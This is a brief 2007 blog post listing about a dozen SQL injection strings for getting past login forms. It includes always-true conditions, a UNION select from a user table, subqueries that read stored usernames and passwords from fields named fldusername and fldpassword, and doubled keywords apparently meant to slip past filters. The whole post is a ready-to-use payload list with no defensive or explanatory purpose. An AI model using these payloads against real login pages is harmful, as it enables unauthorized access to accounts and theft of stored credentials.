Tuesday, November 13, 2007

code BY pass SQL injecktion



pass:' union select * from tbluser where '1'='1
--------------------------------------------
user&pass : '<>'1
--------------------------------------------
user&pass : a'or'a'='a
--------------------------------------------
user : '<>1 and fldusername<>'
pass : '
--------------------------------------------
user&pass: ' and 1=1or '1'='1
--------------------------------------------
user : '+(select top 1 fldusername from tbluser)+'
pass : '+(select top 1 fldpassword from tbluser)+'
-------------------------------------------
user&pass: ' not in ('1') and '1'='1
-------------------------------------------
user&pass : 1'<'2
-------------------------------------------
user&pass : ' is not null and '1'='1
------------------------------------------
user :' oror ''='
pass:' oror ''='
------------------------------------------
user/pass :' oorr ''='

' or ' ,a'or'a'='a ,' oror ''='

No comments: